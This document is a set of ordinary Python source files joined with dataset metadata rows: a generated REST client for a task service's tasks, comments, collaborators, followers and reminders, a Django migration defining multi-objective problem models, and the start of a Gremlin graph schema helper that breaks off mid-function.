return TaskCompleteReqCall(self, request_opts=request_opts)
def create(self, body, tenant_key=None, timeout=None):
# type: (Task, str, int) -> TaskCreateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCreateReqCall(self, body, request_opts=request_opts)
def delete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskDeleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskDeleteReqCall(self, request_opts=request_opts)
def get(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskGetReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskGetReqCall(self, request_opts=request_opts)
def patch(self, body, tenant_key=None, timeout=None):
# type: (TaskPatchReqBody, str, int) -> TaskPatchReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskPatchReqCall(self, body, request_opts=request_opts)
def uncomplete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskUncompleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskUncompleteReqCall(self, request_opts=request_opts)
class TaskCommentService(object):
def __init__(self, service):
# type: (Service) -> None
self.service = service
def create(self, body, tenant_key=None, timeout=None):
# type: (Comment, str, int) -> TaskCommentCreateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCommentCreateReqCall(self, body, request_opts=request_opts)
def delete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskCommentDeleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCommentDeleteReqCall(self, request_opts=request_opts)
def get(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskCommentGetReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCommentGetReqCall(self, request_opts=request_opts)
def update(self, body, tenant_key=None, timeout=None):
# type: (TaskCommentUpdateReqBody, str, int) -> TaskCommentUpdateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCommentUpdateReqCall(self, body, request_opts=request_opts)
class TaskCollaboratorService(object):
def __init__(self, service):
# type: (Service) -> None
self.service = service
def create(self, body, tenant_key=None, timeout=None):
# type: (Collaborator, str, int) -> TaskCollaboratorCreateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCollaboratorCreateReqCall(self, body, request_opts=request_opts)
def delete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskCollaboratorDeleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCollaboratorDeleteReqCall(self, request_opts=request_opts)
def list(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskCollaboratorListReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskCollaboratorListReqCall(self, request_opts=request_opts)
class TaskFollowerService(object):
def __init__(self, service):
# type: (Service) -> None
self.service = service
def create(self, body, tenant_key=None, timeout=None):
# type: (Follower, str, int) -> TaskFollowerCreateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskFollowerCreateReqCall(self, body, request_opts=request_opts)
def delete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskFollowerDeleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskFollowerDeleteReqCall(self, request_opts=request_opts)
def list(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskFollowerListReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskFollowerListReqCall(self, request_opts=request_opts)
class TaskReminderService(object):
def __init__(self, service):
# type: (Service) -> None
self.service = service
def create(self, body, tenant_key=None, timeout=None):
# type: (Reminder, str, int) -> TaskReminderCreateReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskReminderCreateReqCall(self, body, request_opts=request_opts)
def delete(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskReminderDeleteReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskReminderDeleteReqCall(self, request_opts=request_opts)
def list(self, tenant_key=None, timeout=None):
# type: (str, int) -> TaskReminderListReqCall
request_opts = [] # type: List[Callable[[Any], Any]]
if timeout is not None:
request_opts += [set_timeout(timeout)]
if tenant_key is not None:
request_opts += [set_tenant_key(tenant_key)]
return TaskReminderListReqCall(self, request_opts=request_opts)
class TaskCompleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCompleteReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/complete', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskService, Task, List[Any]) -> None
self.service = service
self.body = body
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskCreateReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskDeleteReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskGetReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskGetReqCall
self.path_params['task_id'] = task_id
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskGetReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskGetResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskGetResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskPatchReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskService, TaskPatchReqBody, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskPatchReqCall
self.path_params['task_id'] = task_id
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskPatchReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskPatchResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id', 'PATCH', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskPatchResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskUncompleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskUncompleteReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/uncomplete', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCollaboratorCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskCollaboratorService, Collaborator, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCollaboratorCreateReqCall
self.path_params['task_id'] = task_id
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskCollaboratorCreateReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskCollaboratorCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskCollaboratorCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCollaboratorDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskCollaboratorService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCollaboratorDeleteReqCall
self.path_params['task_id'] = task_id
return self
def set_collaborator_id(self, collaborator_id):
# type: (str) -> TaskCollaboratorDeleteReqCall
self.path_params['collaborator_id'] = collaborator_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators/:collaborator_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCollaboratorListReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskCollaboratorService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCollaboratorListReqCall
self.path_params['task_id'] = task_id
return self
def set_page_size(self, page_size):
# type: (int) -> TaskCollaboratorListReqCall
self.query_params['page_size'] = page_size
return self
def set_page_token(self, page_token):
# type: (str) -> TaskCollaboratorListReqCall
self.query_params['page_token'] = page_token
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskCollaboratorListReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskCollaboratorListResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/collaborators', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskCollaboratorListResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCommentCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskCommentService, Comment, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCommentCreateReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[TaskCommentCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskCommentCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCommentDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskCommentService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCommentDeleteReqCall
self.path_params['task_id'] = task_id
return self
def set_comment_id(self, comment_id):
# type: (int) -> TaskCommentDeleteReqCall
self.path_params['comment_id'] = comment_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCommentGetReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskCommentService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCommentGetReqCall
self.path_params['task_id'] = task_id
return self
def set_comment_id(self, comment_id):
# type: (int) -> TaskCommentGetReqCall
self.path_params['comment_id'] = comment_id
return self
def do(self):
# type: () -> APIResponse[Type[TaskCommentGetResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskCommentGetResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskCommentUpdateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskCommentService, TaskCommentUpdateReqBody, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskCommentUpdateReqCall
self.path_params['task_id'] = task_id
return self
def set_comment_id(self, comment_id):
# type: (int) -> TaskCommentUpdateReqCall
self.path_params['comment_id'] = comment_id
return self
def do(self):
# type: () -> APIResponse[Type[TaskCommentUpdateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/comments/:comment_id', 'PUT', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskCommentUpdateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskFollowerCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskFollowerService, Follower, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskFollowerCreateReqCall
self.path_params['task_id'] = task_id
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskFollowerCreateReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskFollowerCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskFollowerCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskFollowerDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskFollowerService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskFollowerDeleteReqCall
self.path_params['task_id'] = task_id
return self
def set_follower_id(self, follower_id):
# type: (str) -> TaskFollowerDeleteReqCall
self.path_params['follower_id'] = follower_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers/:follower_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskFollowerListReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskFollowerService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskFollowerListReqCall
self.path_params['task_id'] = task_id
return self
def set_page_size(self, page_size):
# type: (int) -> TaskFollowerListReqCall
self.query_params['page_size'] = page_size
return self
def set_page_token(self, page_token):
# type: (str) -> TaskFollowerListReqCall
self.query_params['page_token'] = page_token
return self
def set_user_id_type(self, user_id_type):
# type: (str) -> TaskFollowerListReqCall
self.query_params['user_id_type'] = user_id_type
return self
def do(self):
# type: () -> APIResponse[Type[TaskFollowerListResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/followers', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskFollowerListResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskReminderCreateReqCall(object):
def __init__(self, service, body, request_opts=None):
# type: (TaskReminderService, Reminder, List[Any]) -> None
self.service = service
self.body = body
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderCreateReqCall
self.path_params['task_id'] = task_id
return self
def do(self):
# type: () -> APIResponse[Type[TaskReminderCreateResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders', 'POST', [ACCESS_TOKEN_TYPE_TENANT],
self.body, output_class=TaskReminderCreateResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskReminderDeleteReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskReminderService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderDeleteReqCall
self.path_params['task_id'] = task_id
return self
def set_reminder_id(self, reminder_id):
# type: (str) -> TaskReminderDeleteReqCall
self.path_params['reminder_id'] = reminder_id
return self
def do(self):
# type: () -> APIResponse[Type[None]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders/:reminder_id', 'DELETE', [ACCESS_TOKEN_TYPE_TENANT],
None, request_opts=self.request_opts)
resp = req.do(conf)
return resp
class TaskReminderListReqCall(object):
def __init__(self, service, request_opts=None):
# type: (TaskReminderService, List[Any]) -> None
self.service = service
self.path_params = {} # type: Dict[str, Any]
self.query_params = {} # type: Dict[str, Any]
if request_opts:
self.request_opts = request_opts
else:
self.request_opts = [] # type: List[Any]
def set_task_id(self, task_id):
# type: (str) -> TaskReminderListReqCall
self.path_params['task_id'] = task_id
return self
def set_page_size(self, page_size):
# type: (int) -> TaskReminderListReqCall
self.query_params['page_size'] = page_size
return self
def set_page_token(self, page_token):
# type: (str) -> TaskReminderListReqCall
self.query_params['page_token'] = page_token
return self
def do(self):
# type: () -> APIResponse[Type[TaskReminderListResult]]
root_service = self.service.service
conf = root_service.conf
self.request_opts += [set_path_params(self.path_params)]
self.request_opts += [set_query_params(self.query_params)]
req = APIRequest('/open-apis/task/v1/tasks/:task_id/reminders', 'GET', [ACCESS_TOKEN_TYPE_TENANT],
None, output_class=TaskReminderListResult, request_opts=self.request_opts)
resp = req.do(conf)
return resp
| 33.599795 | 138 | 0.627715 | 3,798 | 32,827 | 5.167193 | 0.033439 | 0.142369 | 0.072611 | 0.03679 | 0.826344 | 0.818089 | 0.800866 | 0.787618 | 0.772637 | 0.75358 | 0 | 0.000827 | 0.263624 | 32,827 | 976 | 139 | 33.634221 | 0.811029 | 0.179395 | 0 | 0.83612 | 1 | 0 | 0.047441 | 0.031939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.167224 | false | 0 | 0.008361 | 0 | 0.342809 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3a58d20eb55f7e68d759b8a5492732da4771c383 | 4,664 | py | Python | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | molp_app/migrations/0001_initial.py | rhombicosi/IDOL | ee8aebd69bef6e90b102ec2be16216a7fda74b9e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.9 on 2022-02-18 10:30
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Problem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lp', models.FileField(upload_to='problems/lps/', verbose_name='input file')),
('zips', models.FileField(blank=True, upload_to='problems/zips/', verbose_name='zips')),
('task_id', models.CharField(blank=True, max_length=50, null=True)),
('task_status', models.CharField(blank=True, max_length=50, null=True)),
('maxgap', models.FloatField(choices=[(0, '0%'), (0.1, '10%'), (0.25, '25%')], default=0.1, verbose_name='Max gap')),
('maxtime', models.CharField(choices=[('inf', 'Infinity'), ('30', '30s'), ('60', '1m'), ('300', '5m'), ('600', '10m'), ('1200', '20m'), ('1800', '30m'), ('2400', '40m'), ('3600', '1h')], default='inf', max_length=50, verbose_name='Max time')),
],
),
migrations.CreateModel(
name='UserProblem',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('lp', models.FileField(upload_to='problems/lps/', verbose_name='input file')),
('zips', models.FileField(blank=True, upload_to='problems/zips/', verbose_name='zips')),
('task_id', models.CharField(blank=True, max_length=50, null=True)),
('task_status', models.CharField(blank=True, max_length=50, null=True)),
('maxgap', models.FloatField(choices=[(0, '0%'), (0.1, '10%'), (0.25, '25%')], default=0.1, verbose_name='')),
('maxtime', models.CharField(choices=[('inf', 'Infinity'), ('30', '30s'), ('60', '1m'), ('300', '5m'), ('600', '10m'), ('1200', '20m'), ('1800', '30m'), ('2400', '40m'), ('3600', '1h')], default='inf', max_length=50, verbose_name='Max time')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='problems', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserProblemParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weights', models.FileField(blank=True, upload_to='problems/parameters/weights/')),
('reference', models.FileField(blank=True, upload_to='problems/parameters/reference/', verbose_name='Y')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='molp_app.userproblem')),
],
),
migrations.CreateModel(
name='UserProblemChebyshev',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('chebyshev', models.FileField(blank=True, upload_to='problems/chebyshev/')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='chebyshev', to='molp_app.userproblem')),
],
),
migrations.CreateModel(
name='ProblemParameters',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weights', models.FileField(blank=True, upload_to='problems/parameters/weights/')),
('reference', models.FileField(blank=True, upload_to='problems/parameters/reference/', verbose_name='Y')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='parameters', to='molp_app.problem')),
],
),
migrations.CreateModel(
name='ProblemChebyshev',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('chebyshev', models.FileField(blank=True, upload_to='problems/chebyshev/')),
('problem', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='chebyshev', to='molp_app.problem')),
],
),
]
| 60.571429 | 259 | 0.596055 | 505 | 4,664 | 5.372277 | 0.20396 | 0.064873 | 0.058975 | 0.07077 | 0.820494 | 0.820494 | 0.820494 | 0.793955 | 0.793955 | 0.793955 | 0 | 0.036198 | 0.224057 | 4,664 | 76 | 260 | 61.368421 | 0.713457 | 0.009648 | 0 | 0.666667 | 1 | 0 | 0.17089 | 0.029673 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.043478 | 0 | 0.101449 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28bf2d69da68600d800509b891de6da72ed6eaee | 5,783 | py | Python | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 9 | 2020-09-28T12:56:04.000Z | 2021-07-13T22:50:44.000Z | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 4 | 2020-12-22T02:42:32.000Z | 2021-03-16T10:47:57.000Z | invana_engine/gremlin/schema.py | rrmerugu/invana-engine | fc3f44b1417f3399b5a7e8414717c30eb4f78e0b | [
"Apache-2.0"
] | 2 | 2021-06-17T04:53:27.000Z | 2021-11-20T19:06:11.000Z | from .base import GremlinOperationBase, CRUDOperationsBase
from gremlin_python.process.strategies import *
from gremlin_python.process.traversal import Order
class SchemaOps(GremlinOperationBase):
def get_all_vertices_schema(self):
_ = self.gremlin_client.execute_query(
"g.V().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
schema_data = []
for schema in _:
for k, v in schema.items():
schema_data.append(
{
"label": k,
"propertyKeys": v
}
)
return schema_data
def get_vertex_label_schema(self, label: str, namespace: str = None):
# TODO - fix performance
_ = self.gremlin_client.execute_query(
"g.V().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
return {"label": label, "propertyKeys": _[0].get(label, [])}
def get_all_edges_schema(self):
_ = self.gremlin_client.execute_query(
"g.E().group().by(label).by(properties().label().dedup().fold())",
serialize_elements=False
)
schema_data = []
for schema in _:
for k, v in schema.items():
schema_data.append(
{
"label": k,
"propertyKeys": v
}
)
return schema_data
def get_edge_label_schema(self, label: str, namespace: str = None):
# TODO - fix performance
